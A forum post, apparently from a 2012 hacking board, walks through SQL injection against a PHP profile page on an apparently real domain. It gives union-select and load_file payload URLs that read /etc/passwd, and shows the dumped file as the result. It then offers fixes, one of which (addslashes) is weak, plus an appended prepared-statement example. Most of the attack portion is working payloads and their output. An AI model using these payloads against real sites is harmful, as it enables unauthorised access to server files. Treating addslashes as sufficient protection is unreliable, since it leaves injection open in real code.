Post: SQL Injection 2 Get Server Files
05-06-2012, 01:43 AM #1
KingcreekS
NOTHING IS IMPOSSIBL
Let's say we've found an SQL injection and magic_quotes = off. It's awesome, so first we want to know if we've got a panel... so we've used lots of tools, not even robots.txt, so... What can we do? Maybe we can call passwd...

    <?php
    // The id comes straight from the query string and is dropped into the SQL
    // text unescaped, so a quote in ?id= changes the query itself.
    $id = $_GET['id'];
    $peticion = mysql_query("SELECT * FROM usuarios WHERE id = '$id'");
    ?>


Here we have the God Damn Vulnerable Code haha. Now... where is the error...

In the GET we haven't filtered anything... SQL injection...


Here is the web:
    https://www.webvulnerable.pe/profile.php?id=%27


Now an injection, a simple injection...
    https://www.webvulnerable.pe/profile.php?id=11+union+all+select+1,2,3,4,5--


So... now... let's inject... with the function load_file
    https://www.webvulnerable.pe/profile.php?id=11+union+all+select+1,2,null,load_file('etc/passwd'),5--


Magic...

Originally posted by another user
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
    distcache:x:94:94:distcache:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
    squid:x:23:23::/var/spool/squid:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    luci:x:100:101::/var/lib/luci:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    avahi:x:70:70:Avahi daemon:/:/sbin/nologin
    pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
    ricci:x:101:102:ricci daemon user:/var/lib/ricci:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
    gdm:x:42:42::/var/gdm:/sbin/nologin
    sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
    hpsmh:x:103:500::/opt/hp/hpsmh:/sbin/nologin
    Administrador:x:500:501::/home/Administrador:/bin/bash
    mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
    oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin


Hahaha yeah... now... we've got the passwd, but this is an example, because if not... then you've got to do some path traversal to get the passwd file...


How can we protect ourselves?

    <?php
    // Casting to int keeps only a number, so no quote or SQL keyword survives in $id.
    $id = (int)$_GET['id'];
    $peticion = mysql_query("SELECT columna FROM usuarios WHERE id = '$id'");
    ?>


or

    <?php
    // addslashes() backslash-escapes quotes, so a ' in ?id= can no longer close the string literal.
    $id = addslashes($_GET['id']);
    $peticion = mysql_query("SELECT * FROM usuarios WHERE id = '$id'");
    ?>


Thanks & Regards
Bloodfocus

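For comparison with the two fixes in the post above, here is the same lookup written with a PDO prepared statement; this is an added example, not code from the original post, and the DSN, credentials, database name and the minimum id value are assumptions.

```php
<?php
// Added example (not from the original post): the profile lookup from the post,
// done with a prepared statement so $_GET['id'] can never change the SQL text.
// Assumptions: MySQL on localhost, database "app", read-only account "app_ro",
// and the table "usuarios" from the post. DSN and credentials are placeholders.
declare(strict_types=1);

function buscarUsuario(PDO $db, string $rawId): ?array
{
    // Validate the shape first: an id is a positive integer, anything else is rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The value is sent to the server separately from the query text, so a
    // payload such as "11 union all select ..." is treated as data, never as SQL.
    $stmt = $db->prepare('SELECT * FROM usuarios WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO(
    'mysql:host=localhost;dbname=app;charset=utf8mb4', // placeholder DSN
    'app_ro',                                          // placeholder user
    'CHANGEME',                                        // placeholder password
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$usuario = buscarUsuario($db, $_GET['id'] ?? '');
if ($usuario === null) {
    http_response_code(404);
    exit('not found');
}
// Escape on output so a stored value cannot inject HTML into the page.
foreach ($usuario as $columna => $valor) {
    echo htmlspecialchars((string) $columna, ENT_QUOTES, 'UTF-8'), ': ',
         htmlspecialchars((string) $valor, ENT_QUOTES, 'UTF-8'), "<br>\n";
}
```

Alongside this, the MySQL account the web application connects with should not hold the FILE privilege, which is what load_file() needs; that limits the damage if some other query is ever left unparameterised.
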
05-06-2012, 04:10 PM #2
KingcreekS
NOTHING IS IMPOSSIBL
If someone doesn't know something, just post it and I will help you
